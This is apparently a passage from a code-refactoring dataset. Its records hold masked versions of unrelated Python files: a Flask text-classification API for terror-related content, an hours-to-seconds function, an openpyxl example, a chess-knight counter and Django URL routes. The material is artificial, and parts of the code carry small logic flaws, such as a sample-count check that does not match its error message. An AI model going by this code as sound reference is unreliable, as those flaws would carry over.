"step-5": "# POST API for Red Alert project - NLP and Metalearning components\n# Insikt Intelligence S.L. 2019\n\nimport pandas as pd\nimport pickle\nfrom flask import Flask, render_template, request, jsonify\nfrom utilities import load_data, detect_language\nfrom preprocessing import preprocess, Tagger, remove_stopwords\nimport json\nfrom gensim.models import KeyedVectors\nfrom Embeddings import Embeddings, to_vector_single, to_vector_single_nonzeros\nimport numpy as np\nimport os\nfrom analysis import analyze\nfrom probability_terror import probability_terror\nfrom new_terms_no_lang import new_terms\nfrom classifier import classifier\nfrom claslisting import claslisting\nfrom audit import audit\n\napp = Flask(__name__)\n\nemb_dict = {\"en\": \"embedding-EN\", \"ar\": \"embedding-AR\", \"es\": \"embedding-ES\", \"ro\": \"embedding-RO\",\"fr\": \"embedding-FR\"}\n\[email protected]('/vectorize',methods=['POST'])\ndef make_vectorize():\n try:\n #Load the data\n data = request.get_json()\n\n except Exception as e:\n raise e\n\n if data == {}:\n return(bad_request())\n else:\n #Get the text and the language\n try:\n lang = data['lang']\n except:\n try:\n lang=detect_language(data['text'])\n print(lang) \n except: \n responses=jsonify(\"Error in vectorize: language field is missing\")\n return responses \n try:\n text = data['text']\n except:\n responses=jsonify(\"Error in vectorize: text is missing\")\n return responses \n \n if lang not in ['en','es','ar','ro','fr']:\n responses=jsonify(\"Language not available. Language must be in ['en','es','ar','ro','fr']\")\n return responses\n #Preprocess the text\n print(\"Vectorize...\")\n\n embeddings = Embeddings(emb_dict[lang])\n\n processed_text = preprocess(text)\n no_stpw_text = remove_stopwords(processed_text, lang)\n vectorized_tokens=to_vector_single_nonzeros(no_stpw_text, embeddings,len(no_stpw_text))\n\t\n if len(vectorized_tokens) > 0:\n vectorized_text = np.mean(vectorized_tokens, axis=0)\n else:\n vectorized_text =np.zeros((300,)*1)\n print(vectorized_text)\n \n #Send the response codes\n responses = jsonify(vector=vectorized_text.tolist())\n responses.status_code = 200\n return responses\n\n\[email protected]('/probability',methods=['POST'])\ndef make_probability():\n try:\n #Load the data\n data = request.get_json()\n\n except Exception as e:\n raise e\n\n if data == {}:\n return(bad_request())\n else:\n #Get the text,language and classifier\n try:\n lang = data['lang']\n except:\n try:\n lang=detect_language(data['text'])\n print(lang) \n except: \n responses=jsonify(\"Error in vectorize: language field is missing\")\n return responses \n try:\n text = data['text']\n except:\n responses=jsonify(\"Error in probability: text is missing\")\n return responses\n \n try:\n cls = data['classifier']\n except:\n responses=jsonify(\"Error in probability: classifier is missing\")\n return responses\n \n if lang not in ['en','es','ar','ro','fr']:\n responses=jsonify(\"Language not available. Language must be in ['en','es','ar','ro','fr']\")\n return responses\n \n \n #Preprocess the text\n print(\"Computing probability of having content related to \"+cls)\n\n probability = probability_terror(text,lang,cls)\n \n #Send the response codes\n responses = jsonify(probability=probability)\n responses.status_code = 200\n return responses\n\n\[email protected]('/analyze',methods=['POST'])\ndef make_analyze():\n\n try:\n #Load the data\n data = request.get_json()\n\n except Exception as e:\n raise e\n\n if data == {}:\n return(bad_request())\n else:\n\n #Get the text and the language\n\n try:\n lang = data['lang']\n except:\n try:\n lang=detect_language(data['text'])\n print(lang) \n except: \n responses=jsonify(\"Error in vectorize: language field is missing\")\n return responses \n try:\n text = data['text'] # we assume text is tokenized\n except:\n responses=jsonify(\"Error in analyze: text is missing\")\n return responses\n\n if lang not in ['en','es','ar','ro','fr']:\n responses=jsonify( message = \"Language not available. Language must be in ['en','es','ar','ro','fr']\")\n return responses\n \n \n filename = os.path.join(os.path.dirname(__file__), 'models-registry.json')\n registry = load_data(filename)\n\n analysis = analyze(text, lang, registry)\n #print(analysis[0])\n #Send the response codes\n responses = jsonify(concepts=analysis[0],key_ideas=analysis[1],topics=analysis[2])\n responses.status_code = 200\n return responses\n\n\[email protected]('/terms',methods=['POST'])\ndef make_terms():\n\n try:\n #Load the data\n data = request.get_json()\n\n except Exception as e:\n raise e\n\n if data == {}:\n return(bad_request())\n else:\n\n texts = data['dataset'] # we assume text is tokenized \n \n\t#Preprocess the text\n print(\"Suggesting new terms for search...\") \n terms=new_terms(texts)\n\t#print(terms)\n #Send the response codes\n responses = jsonify(message=\"Suggested new terms for search: \",terms= list(terms))\n responses.status_code = 200\n return responses\n\n\[email protected]('/sento',methods=['POST'])\ndef make_sento():\n\n try:\n #Load the data\n data = request.get_json()\n\n except Exception as e:\n raise e\n\n if data == {}:\n return(bad_request())\n else:\n\n #Get the text, language and classifier\n try:\n lang = data['lang']\n except:\n try:\n lang=detect_language(data['text'])\n print(lang) \n except: \n responses=jsonify(\"Error in vectorize: language field is missing\")\n return responses \n try:\n text = data['text']\n except:\n responses=jsonify(\"Error in sento: text is missing\")\n return responses \n try:\n cls = data['classifier']\n except:\n responses=jsonify(\"Error in sento: classifier is missing\")\n return responses\n\n if lang not in ['en','es','ar','ro','fr']:\n responses=jsonify(\"Language not available. Language must be in ['en','es','ar','ro','fr']\")\n return responses\n \n \n \n\t#Preprocess the text\n print(\"Sento analysis\") \n\n\n # Probability\n probability = probability_terror(text,lang,cls)\n print(probability)\n\n # Analyze\n filename = os.path.join(os.path.dirname(__file__), 'models-registry.json')\n registry = load_data(filename)\n\n analysis = analyze(text, lang, registry)\n \n data_audit={\"auditEventType\":\"Start task\",\"details\":{\"sento\":\"NLP analysis\"},\"principal\":\"Analyst\"}\n datajson=json.dumps(data_audit)\n results_audit=audit(datajson)\n\n\n #Send the response codes\n responses = jsonify(probability=probability,concepts=analysis[0],key_ideas=analysis[1],topics=analysis[2])\n responses.status_code = 200\n return responses\n\[email protected]('/classifier',methods=['POST'])\ndef make_classifier():\n try:\n #Load the data\n data = request.get_json()\n\n except Exception as e:\n raise e\n\n if data == {}:\n return(bad_request(\"There is no data for the training\"))\n else:\n #Get the text and the language\n try:\n lang = data['lang']\n except:\n try:\n lang=detect_language(data['text'])\n print(lang) \n except: \n responses=jsonify(\"Error in vectorize: language field is missing\")\n return responses\n try:\n annotated_data = data['annotated_data']\n except:\n responses=jsonify(\"Error in classifier: annotated data is missing\")\n return responses\n try:\n user_id=data['user_id']\n except:\n responses=jsonify(\"Error in classifier: user_id is missing\")\n return responses\n try: \n case_id=data['case_id']\n except:\n responses=jsonify(\"Error in classifier: case_id is missing\")\n return responses\n try: \n clas_name=data['clas_name']\n except:\n responses=jsonify(\"Error in classifier: classifier name is missing\")\n return responses\n\n print(len(annotated_data))\n if len(annotated_data) < 22:\n responses=jsonify( \"Training data set should have more than 10 samples per each class\")\n return responses\t\n\n if lang not in ['en','es','ar','ro','fr']:\n responses=jsonify(\"Language not available. Language must be in ['en','es','ar','ro','fr']\")\n return responses\n \n \n #Train the new classifier\n print(\"Training a new classifier from the user's annotated dataset \")\n\n accuracy=classifier(annotated_data,lang,user_id,case_id,clas_name)\n \n data_audit={\"auditEventType\":\"Start task\",\"details\":{\"classifier\":\"Trains a new classifier based on the annotations provided by the user\"},\"principal\":\"Analyst\"}\n datajson=json.dumps(data_audit)\n results_audit=audit(datajson)\n\n #Send the response codes\n responses = jsonify(message=\"Classifier has been saved. Accuracy given in % - calculated using C-10V\", accuracy=accuracy)\n responses.status_code = 200\n return responses\n\[email protected]('/claslisting',methods=['POST'])\ndef make_claslisting():\n user_id=None\n case_id=None\n try:\n #Load the data\n data = request.get_json()\n\n except Exception as e:\n raise e\n\n if data == {}:\n return(bad_request())\n else:\n try:\n user_id=data['user_id']\n except:\n responses=jsonify(message=\"Error in classifiers listing: user_id is missing\")\n return responses\n try:\n case_id=data['case_id']\n except:\n responses=jsonify(message=\"Error in classifiers listing: case_id is missing\")\n return responses\n \n available_classifiers=claslisting(user_id,case_id)\n \n data_audit={\"auditEventType\":\"Start task\",\"details\":{\"claslisting\":\"Lists the available classifiers\"},\"principal\":\"Analyst\"}\n datajson=json.dumps(data_audit)\n results_audit=audit(datajson)\n\n #Send the response codes\n responses = jsonify(available_classifiers=available_classifiers)\n responses.status_code = 200\n return responses\n \n\[email protected]('/my400')\ndef bad_request(msg=''):\n code = 400\n if msg=='':\n msg = 'Error'\n return msg, code\n\nif __name__ == '__main__':\n\n #app.run()\n app.run(host='0.0.0.0',port=5000)\n",
"step-ids": [
7,
8,
10,
11,
12
]
}
|
[
7,
8,
10,
11,
12
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def how_many_seconds(hrs_int):
secs_int = None
if hrs_int > 0 and hrs_int is not None:
secs_int = hrs_int * 60 * 60
return secs_int
else:
raise TypeError('Invalid input type')
<|reserved_special_token_1|>
"""
CONVERT HOURS INTO SECONDS
Write a function that converts hours into seconds.
Examples:
- how_many_seconds(2) -> 7200
- how_many_seconds(10) -> 36000
- how_many_seconds(24) -> 86400
Notes:
- 60 seconds in a minute; 60 minutes in a hour.
- Don't forget to return your answer.
"""
"""
U.P.E.R.
(A) UNDERSTAND:
- Objective:
- Write an algorithm that takes in a single input integer (representing a
given number of hours) and returns a single output (representing the
equivalent number of seconds).
- Expected Inputs:
- Number: 1
- Data Type: integer
- Variable Name: 'hrs_int'
- Expected Outputs:
- Number: 1
- Data Type: integer
- Variable Name: 'secs_int'
- My Examples:
- how_many_seconds(1) -> 3600
- 1 hr * (60 min/1 hr) * (60 sec/1 min) = 3600 secs
- how_many_seconds(5) -> 18000
- 5 hr * (60 min/1 hr) * (60 sec/1 min) = 18000 secs
- how_many_seconds(12) -> 43200
- 12 hr * (60 min/1 hr) * (60 sec/1 min) = 43200 secs
- Edge Cases & Constraints to Consider:
- Can the input be negative?
- No, because time is measured in positive units. The input must be greater than 0.
- Can the input be a floating point number?
- Yes, because the number of hours doesn't need to be whole in order
to find an equivalent number of seconds.
- Can the input be None?
- No, because you cannot convert 'None' number of hours.
(B) PLAN:
(1) Create a function that takes in a single given input, 'hrs_int', and returns a single output, 'secs_int'.
(2) Assign the value of 'None' to two new variables, 'mins_int' and 'secs_int'.
(3) Make sure that a conversion of hours to seconds will NOT occur unless the given input, 'hrs_int', is in fact of either "integer" or "float" data type.
(a) If the given input, 'hrs_int', is a valid argument, proceed with converting the given number of hours into an equivalent number of seconds.
i. Convert the number of hours in 'hrs_int' into an equivalent number of minutes and store that value in the previously declared 'mins_int' variable.
ii. Convert the number of minutes in 'mins_int' into an equivalent number of seconds and store that value in the previously declared 'secs_int' variable.
(b) If the given input, 'hrs_int', is an INVALID argument (i.e. - negative value, not of 'integer' or 'float' data types, null), handle the error with a 'TypeError' exception.
(4) Return the value of 'secs_int'.
"""
# (C) EXECUTE:
# def how_many_seconds(hrs_int):
# mins_int = None
# secs_int = None
# if hrs_int > 0 and hrs_int is not None:
# mins_int = hrs_int * 60 # converts given hours into minutes
# secs_int = mins_int * 60 # converts given minutes into seconds
# else:
# raise TypeError("Invalid input type")
# return secs_int
# (D) REFLECT/REFACTOR:
# Asymptotic Analysis:
# - Time Complexity = O(1)
# - Space Complexity = O(1)
# Can the brute force solution be optimized further?
# - Yes, but only by reducing the total number of lines of code and NOT by
# improving time/space complexity of the solution.
def how_many_seconds(hrs_int):
secs_int = None
if hrs_int > 0 and hrs_int is not None:
secs_int = hrs_int * 60 * 60 # converts given hours into seconds
return secs_int
else:
raise TypeError("Invalid input type")
|
flexible
|
{
"blob_id": "34c7e6b6bc687bc641b7e3b9c70fd0844af8e340",
"index": 8969,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef how_many_seconds(hrs_int):\n secs_int = None\n if hrs_int > 0 and hrs_int is not None:\n secs_int = hrs_int * 60 * 60\n return secs_int\n else:\n raise TypeError('Invalid input type')\n",
"step-3": "\"\"\"\nCONVERT HOURS INTO SECONDS\n\nWrite a function that converts hours into seconds.\n\nExamples:\n - how_many_seconds(2) -> 7200\n - how_many_seconds(10) -> 36000\n - how_many_seconds(24) -> 86400\n \nNotes:\n - 60 seconds in a minute; 60 minutes in a hour.\n - Don't forget to return your answer.\n\"\"\"\n\n\"\"\"\nU.P.E.R.\n\n(A) UNDERSTAND:\n - Objective:\n - Write an algorithm that takes in a single input integer (representing a\n given number of hours) and returns a single output (representing the \n equivalent number of seconds).\n \n - Expected Inputs:\n - Number: 1\n - Data Type: integer\n - Variable Name: 'hrs_int'\n \n - Expected Outputs:\n - Number: 1\n - Data Type: integer\n - Variable Name: 'secs_int'\n \n - My Examples:\n - how_many_seconds(1) -> 3600\n - 1 hr * (60 min/1 hr) * (60 sec/1 min) = 3600 secs\n - how_many_seconds(5) -> 18000\n - 5 hr * (60 min/1 hr) * (60 sec/1 min) = 18000 secs\n - how_many_seconds(12) -> 43200\n - 12 hr * (60 min/1 hr) * (60 sec/1 min) = 43200 secs\n\n - Edge Cases & Constraints to Consider:\n - Can the input be negative?\n - No, because time is measured in positive units. The input must be greater than 0.\n - Can the input be a floating point number?\n - Yes, because the number of hours doesn't need to be whole in order\n to find an equivalent number of seconds.\n - Can the input be None?\n - No, because you cannot convert 'None' number of hours.\n \n(B) PLAN:\n\n (1) Create a function that takes in a single given input, 'hrs_int', and returns a single output, 'secs_int'.\n \n (2) Assign the value of 'None' to two new variables, 'mins_int' and 'secs_int'.\n \n (3) Make sure that a conversion of hours to seconds will NOT occur unless the given input, 'hrs_int', is in fact of either \"integer\" or \"float\" data type.\n\n (a) If the given input, 'hrs_int', is a valid argument, proceed with converting the given number of hours into an equivalent number of seconds.\n \n i. Convert the number of hours in 'hrs_int' into an equivalent number of minutes and store that value in the previously declared 'mins_int' variable.\n \n ii. Convert the number of minutes in 'mins_int' into an equivalent number of seconds and store that value in the previously declared 'secs_int' variable.\n \n (b) If the given input, 'hrs_int', is an INVALID argument (i.e. - negative value, not of 'integer' or 'float' data types, null), handle the error with a 'TypeError' exception.\n \n (4) Return the value of 'secs_int'.\n\n\"\"\"\n\n# (C) EXECUTE:\n\n# def how_many_seconds(hrs_int):\n# mins_int = None\n# secs_int = None\n \n# if hrs_int > 0 and hrs_int is not None:\n# mins_int = hrs_int * 60 # converts given hours into minutes\n# secs_int = mins_int * 60 # converts given minutes into seconds\n# else: \n# raise TypeError(\"Invalid input type\")\n\n# return secs_int\n\n# (D) REFLECT/REFACTOR:\n\n# Asymptotic Analysis:\n# - Time Complexity = O(1)\n# - Space Complexity = O(1)\n\n# Can the brute force solution be optimized further?\n# - Yes, but only by reducing the total number of lines of code and NOT by\n# improving time/space complexity of the solution.\n\ndef how_many_seconds(hrs_int):\n secs_int = None\n \n if hrs_int > 0 and hrs_int is not None:\n secs_int = hrs_int * 60 * 60 # converts given hours into seconds\n return secs_int\n else: \n raise TypeError(\"Invalid input type\")",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
# 引入基础的工作表
from openpyxl import Workbook
# 引入增强的修改功能
from openpyxl.styles import Font,Alignment,Border,Side,PatternFill,colors
# import openpyxl
def make_example():
# 设定文件目录
addr = './example.xlsx'
# 初始化文件,切换到活动的工作表
work_book = Workbook()
# 读取文件采用
# work_book = openpyxl.load_workbook(addr)
work_sheet = work_book.active
# 直接对表格对象赋值
work_sheet['A1'] = 'Hello World!'
# 采用指定行列的方法赋值(第2行,第二列)
select_cell = work_sheet.cell(row=2,column=2,value='I select this cell')
# 添加两行数据到表格
work_sheet.append(['The quick brown fox',' jumps over ','a lazy dog.'])
work_sheet.append(['The quick brown fox',' ',' jumps over ','a lazy dog.'])
# 合并两个单元格作为示范
work_sheet.merge_cells('A3:B3')
work_sheet.merge_cells('A4:B4')
# 遍历表格,读取表格中的数据
# 初始化字体
SIMSUN_20_BOLD = Font(name='宋体',size=12,bold=True)
# 初始化表格对齐模板
CENTER_ALIGN = Alignment(horizontal='center',vertical='center')
# 初始化表格边框样式
LE,RI,TO,BO = [Side(style='thin',color='000000')]*4
THIN_BORDER = Border(left=LE,right=RI,top=TO,bottom=BO)
# 遍历表格,读取表格中的数据
for row in work_sheet['A1:D4']:
for cell in row:
# 把样式赋值给表格
cell.font = SIMSUN_20_BOLD
cell.alignment = CENTER_ALIGN
cell.border = THIN_BORDER
# print(cell.value)
# 设置行高
work_sheet.row_dimensions[1].height=15
work_sheet.row_dimensions[2].height=20
for row_letter in range(3,5,1):
work_sheet.row_dimensions[row_letter].height=17
# 设置列宽
for col_letter in ['A','B']:
work_sheet.column_dimensions[col_letter].width=20
work_sheet.column_dimensions['C'].width=17
work_sheet.column_dimensions['D'].width=25
# 设置颜色
COLOR_MAP = ['ff9900','000000']
COLOR_SIMSUN_20_BOLD = Font(name='宋体',size=12,bold=True,color=COLOR_MAP[0])
BG_FILL = PatternFill('solid', fgColor=COLOR_MAP[1])
work_sheet['A1'].font = COLOR_SIMSUN_20_BOLD
work_sheet['A1'].fill = BG_FILL
# 保存到设定的addr
work_book.save(addr)
if __name__ == "__main__":
make_example()
|
normal
|
{
"blob_id": "d7524a455e62594e321b67f0a32a5c3a7437c1d6",
"index": 1093,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef make_example():\n addr = './example.xlsx'\n work_book = Workbook()\n work_sheet = work_book.active\n work_sheet['A1'] = 'Hello World!'\n select_cell = work_sheet.cell(row=2, column=2, value='I select this cell')\n work_sheet.append(['The quick brown fox', ' jumps over ', 'a lazy dog.'])\n work_sheet.append(['The quick brown fox', ' ', ' jumps over ',\n 'a lazy dog.'])\n work_sheet.merge_cells('A3:B3')\n work_sheet.merge_cells('A4:B4')\n SIMSUN_20_BOLD = Font(name='宋体', size=12, bold=True)\n CENTER_ALIGN = Alignment(horizontal='center', vertical='center')\n LE, RI, TO, BO = [Side(style='thin', color='000000')] * 4\n THIN_BORDER = Border(left=LE, right=RI, top=TO, bottom=BO)\n for row in work_sheet['A1:D4']:\n for cell in row:\n cell.font = SIMSUN_20_BOLD\n cell.alignment = CENTER_ALIGN\n cell.border = THIN_BORDER\n work_sheet.row_dimensions[1].height = 15\n work_sheet.row_dimensions[2].height = 20\n for row_letter in range(3, 5, 1):\n work_sheet.row_dimensions[row_letter].height = 17\n for col_letter in ['A', 'B']:\n work_sheet.column_dimensions[col_letter].width = 20\n work_sheet.column_dimensions['C'].width = 17\n work_sheet.column_dimensions['D'].width = 25\n COLOR_MAP = ['ff9900', '000000']\n COLOR_SIMSUN_20_BOLD = Font(name='宋体', size=12, bold=True, color=\n COLOR_MAP[0])\n BG_FILL = PatternFill('solid', fgColor=COLOR_MAP[1])\n work_sheet['A1'].font = COLOR_SIMSUN_20_BOLD\n work_sheet['A1'].fill = BG_FILL\n work_book.save(addr)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef make_example():\n addr = './example.xlsx'\n work_book = Workbook()\n work_sheet = work_book.active\n work_sheet['A1'] = 'Hello World!'\n select_cell = work_sheet.cell(row=2, column=2, value='I select this cell')\n work_sheet.append(['The quick brown fox', ' jumps over ', 'a lazy dog.'])\n work_sheet.append(['The quick brown fox', ' ', ' jumps over ',\n 'a lazy dog.'])\n work_sheet.merge_cells('A3:B3')\n work_sheet.merge_cells('A4:B4')\n SIMSUN_20_BOLD = Font(name='宋体', size=12, bold=True)\n CENTER_ALIGN = Alignment(horizontal='center', vertical='center')\n LE, RI, TO, BO = [Side(style='thin', color='000000')] * 4\n THIN_BORDER = Border(left=LE, right=RI, top=TO, bottom=BO)\n for row in work_sheet['A1:D4']:\n for cell in row:\n cell.font = SIMSUN_20_BOLD\n cell.alignment = CENTER_ALIGN\n cell.border = THIN_BORDER\n work_sheet.row_dimensions[1].height = 15\n work_sheet.row_dimensions[2].height = 20\n for row_letter in range(3, 5, 1):\n work_sheet.row_dimensions[row_letter].height = 17\n for col_letter in ['A', 'B']:\n work_sheet.column_dimensions[col_letter].width = 20\n work_sheet.column_dimensions['C'].width = 17\n work_sheet.column_dimensions['D'].width = 25\n COLOR_MAP = ['ff9900', '000000']\n COLOR_SIMSUN_20_BOLD = Font(name='宋体', size=12, bold=True, color=\n COLOR_MAP[0])\n BG_FILL = PatternFill('solid', fgColor=COLOR_MAP[1])\n work_sheet['A1'].font = COLOR_SIMSUN_20_BOLD\n work_sheet['A1'].fill = BG_FILL\n work_book.save(addr)\n\n\nif __name__ == '__main__':\n make_example()\n",
"step-4": "from openpyxl import Workbook\nfrom openpyxl.styles import Font, Alignment, Border, Side, PatternFill, colors\n\n\ndef make_example():\n addr = './example.xlsx'\n work_book = Workbook()\n work_sheet = work_book.active\n work_sheet['A1'] = 'Hello World!'\n select_cell = work_sheet.cell(row=2, column=2, value='I select this cell')\n work_sheet.append(['The quick brown fox', ' jumps over ', 'a lazy dog.'])\n work_sheet.append(['The quick brown fox', ' ', ' jumps over ',\n 'a lazy dog.'])\n work_sheet.merge_cells('A3:B3')\n work_sheet.merge_cells('A4:B4')\n SIMSUN_20_BOLD = Font(name='宋体', size=12, bold=True)\n CENTER_ALIGN = Alignment(horizontal='center', vertical='center')\n LE, RI, TO, BO = [Side(style='thin', color='000000')] * 4\n THIN_BORDER = Border(left=LE, right=RI, top=TO, bottom=BO)\n for row in work_sheet['A1:D4']:\n for cell in row:\n cell.font = SIMSUN_20_BOLD\n cell.alignment = CENTER_ALIGN\n cell.border = THIN_BORDER\n work_sheet.row_dimensions[1].height = 15\n work_sheet.row_dimensions[2].height = 20\n for row_letter in range(3, 5, 1):\n work_sheet.row_dimensions[row_letter].height = 17\n for col_letter in ['A', 'B']:\n work_sheet.column_dimensions[col_letter].width = 20\n work_sheet.column_dimensions['C'].width = 17\n work_sheet.column_dimensions['D'].width = 25\n COLOR_MAP = ['ff9900', '000000']\n COLOR_SIMSUN_20_BOLD = Font(name='宋体', size=12, bold=True, color=\n COLOR_MAP[0])\n BG_FILL = PatternFill('solid', fgColor=COLOR_MAP[1])\n work_sheet['A1'].font = COLOR_SIMSUN_20_BOLD\n work_sheet['A1'].fill = BG_FILL\n work_book.save(addr)\n\n\nif __name__ == '__main__':\n make_example()\n",
"step-5": "# 引入基础的工作表\r\nfrom openpyxl import Workbook \r\n# 引入增强的修改功能\r\nfrom openpyxl.styles import Font,Alignment,Border,Side,PatternFill,colors\r\n# import openpyxl\r\ndef make_example():\r\n # 设定文件目录\r\n addr = './example.xlsx'\r\n # 初始化文件,切换到活动的工作表\r\n work_book = Workbook()\r\n # 读取文件采用\r\n # work_book = openpyxl.load_workbook(addr)\r\n work_sheet = work_book.active\r\n # 直接对表格对象赋值\r\n work_sheet['A1'] = 'Hello World!'\r\n # 采用指定行列的方法赋值(第2行,第二列)\r\n select_cell = work_sheet.cell(row=2,column=2,value='I select this cell')\r\n # 添加两行数据到表格\r\n work_sheet.append(['The quick brown fox',' jumps over ','a lazy dog.'])\r\n work_sheet.append(['The quick brown fox',' ',' jumps over ','a lazy dog.'])\r\n # 合并两个单元格作为示范\r\n work_sheet.merge_cells('A3:B3')\r\n work_sheet.merge_cells('A4:B4')\r\n # 遍历表格,读取表格中的数据\r\n # 初始化字体\r\n SIMSUN_20_BOLD = Font(name='宋体',size=12,bold=True)\r\n # 初始化表格对齐模板\r\n CENTER_ALIGN = Alignment(horizontal='center',vertical='center')\r\n # 初始化表格边框样式\r\n LE,RI,TO,BO = [Side(style='thin',color='000000')]*4\r\n THIN_BORDER = Border(left=LE,right=RI,top=TO,bottom=BO)\r\n # 遍历表格,读取表格中的数据\r\n for row in work_sheet['A1:D4']:\r\n for cell in row:\r\n # 把样式赋值给表格\r\n cell.font = SIMSUN_20_BOLD\r\n cell.alignment = CENTER_ALIGN\r\n cell.border = THIN_BORDER\r\n # print(cell.value)\r\n # 设置行高\r\n work_sheet.row_dimensions[1].height=15\r\n work_sheet.row_dimensions[2].height=20\r\n for row_letter in range(3,5,1):\r\n work_sheet.row_dimensions[row_letter].height=17\r\n # 设置列宽\r\n for col_letter in ['A','B']:\r\n work_sheet.column_dimensions[col_letter].width=20\r\n work_sheet.column_dimensions['C'].width=17\r\n work_sheet.column_dimensions['D'].width=25\r\n # 设置颜色\r\n COLOR_MAP = ['ff9900','000000']\r\n COLOR_SIMSUN_20_BOLD = Font(name='宋体',size=12,bold=True,color=COLOR_MAP[0])\r\n BG_FILL = PatternFill('solid', fgColor=COLOR_MAP[1]) \r\n work_sheet['A1'].font = COLOR_SIMSUN_20_BOLD\r\n work_sheet['A1'].fill = BG_FILL\r\n # 保存到设定的addr\r\n work_book.save(addr)\r\n\r\nif __name__ == \"__main__\":\r\n make_example()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
def chessKnight(cell):
pivot = "abcdefgh"
count = 8
for i in range(len(pivot)):
if cell[0] == pivot[i]:
vertical_4 , vertical_2 = False , False
if int(cell[1]) == 8 or int(cell[1]) == 1:
vertical_4 = True
count -= 4
elif int(cell[1]) == 7 or int(cell[1]) == 2:
vertical_2 = True
count -= 2
if i == 0 or i == 7:
if vertical_4:
count -= 2
elif vertical_2:
count -= 3
else:
count -= 4
elif i == 1 or i == 6:
if vertical_4:
count -= 1
else:
count -= 2
return count
|
normal
|
{
"blob_id": "c1335a8128ad4ba6ce6942e80f3c8b68a4210902",
"index": 6355,
"step-1": "<mask token>\n",
"step-2": "def chessKnight(cell):\n pivot = 'abcdefgh'\n count = 8\n for i in range(len(pivot)):\n if cell[0] == pivot[i]:\n vertical_4, vertical_2 = False, False\n if int(cell[1]) == 8 or int(cell[1]) == 1:\n vertical_4 = True\n count -= 4\n elif int(cell[1]) == 7 or int(cell[1]) == 2:\n vertical_2 = True\n count -= 2\n if i == 0 or i == 7:\n if vertical_4:\n count -= 2\n elif vertical_2:\n count -= 3\n else:\n count -= 4\n elif i == 1 or i == 6:\n if vertical_4:\n count -= 1\n else:\n count -= 2\n return count\n",
"step-3": "def chessKnight(cell):\n pivot = \"abcdefgh\"\n count = 8\n for i in range(len(pivot)):\n if cell[0] == pivot[i]:\n vertical_4 , vertical_2 = False , False\n if int(cell[1]) == 8 or int(cell[1]) == 1:\n vertical_4 = True\n count -= 4\n elif int(cell[1]) == 7 or int(cell[1]) == 2:\n vertical_2 = True\n count -= 2\n if i == 0 or i == 7:\n if vertical_4:\n count -= 2\n elif vertical_2:\n count -= 3\n else:\n count -= 4\n elif i == 1 or i == 6:\n if vertical_4:\n count -= 1\n else:\n count -= 2\n return count\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
while t:
n = int(input())
a = list(map(int, input().split()))
a.sort(reverse=True)
s = 0
for i in range(n):
k = a[i] - i
if k >= 0:
s += k
print(s % 1000000007)
t -= 1
<|reserved_special_token_1|>
t = int(input())
while t:
n = int(input())
a = list(map(int, input().split()))
a.sort(reverse=True)
s = 0
for i in range(n):
k = a[i] - i
if k >= 0:
s += k
print(s % 1000000007)
t -= 1
<|reserved_special_token_1|>
# cook your dish here
t=int(input())
while t:
n=int(input())
a=list(map(int,input().split()))
a.sort(reverse=True)
s=0
for i in range(n):
k=a[i]-i
if k>=0:
s+=k
print(s%1000000007)
t-=1
|
flexible
|
{
"blob_id": "44bf409d627a6029ab4c4f1fff99f102b8d57279",
"index": 3954,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile t:\n n = int(input())\n a = list(map(int, input().split()))\n a.sort(reverse=True)\n s = 0\n for i in range(n):\n k = a[i] - i\n if k >= 0:\n s += k\n print(s % 1000000007)\n t -= 1\n",
"step-3": "t = int(input())\nwhile t:\n n = int(input())\n a = list(map(int, input().split()))\n a.sort(reverse=True)\n s = 0\n for i in range(n):\n k = a[i] - i\n if k >= 0:\n s += k\n print(s % 1000000007)\n t -= 1\n",
"step-4": "# cook your dish here\nt=int(input())\nwhile t:\n n=int(input())\n a=list(map(int,input().split()))\n a.sort(reverse=True)\n s=0\n for i in range(n):\n k=a[i]-i\n if k>=0:\n s+=k\n print(s%1000000007)\n t-=1\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
urlpatterns = [url('^$', views.index_view, name='accounts.index'), url(
'^login/$', views.login_view, name='accounts.login'), url('^logout/$',
views.logout_view, name='accounts.logout'), url('^registro/$', views.
registro_usuario_view, name='accounts.registro'), url(
'obrigado/(?P<username>[\\w]+)/$', views.obrigado_view, name=
'accounts.obrigado'), url('^ataque/$', views.ataque_view, name=
'accounts.ataque'), url('^flpositivo/$', views.falsoLoginPositivo_view,
name='accounts.flpositivo'), url('^flnegativo/$', views.
falsoLoginNegativo_view, name='accounts.flnegativo')]
<|reserved_special_token_1|>
from django.conf.urls import url
from . import views
urlpatterns = [url('^$', views.index_view, name='accounts.index'), url(
'^login/$', views.login_view, name='accounts.login'), url('^logout/$',
views.logout_view, name='accounts.logout'), url('^registro/$', views.
registro_usuario_view, name='accounts.registro'), url(
'obrigado/(?P<username>[\\w]+)/$', views.obrigado_view, name=
'accounts.obrigado'), url('^ataque/$', views.ataque_view, name=
'accounts.ataque'), url('^flpositivo/$', views.falsoLoginPositivo_view,
name='accounts.flpositivo'), url('^flnegativo/$', views.
falsoLoginNegativo_view, name='accounts.flnegativo')]
<|reserved_special_token_1|>
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.index_view, name='accounts.index'),
url(r'^login/$', views.login_view, name='accounts.login'),
url(r'^logout/$', views.logout_view, name='accounts.logout'),
url(r'^registro/$', views.registro_usuario_view, name='accounts.registro'),
url(r'obrigado/(?P<username>[\w]+)/$', views.obrigado_view, name='accounts.obrigado'),
url(r'^ataque/$', views.ataque_view, name='accounts.ataque'),
url(r'^flpositivo/$', views.falsoLoginPositivo_view, name='accounts.flpositivo'),
url(r'^flnegativo/$', views.falsoLoginNegativo_view, name='accounts.flnegativo'),
]
|
flexible
|
{
"blob_id": "b4d09b6d8ad5f0584f74adc0fd8116265bb6649b",
"index": 4641,
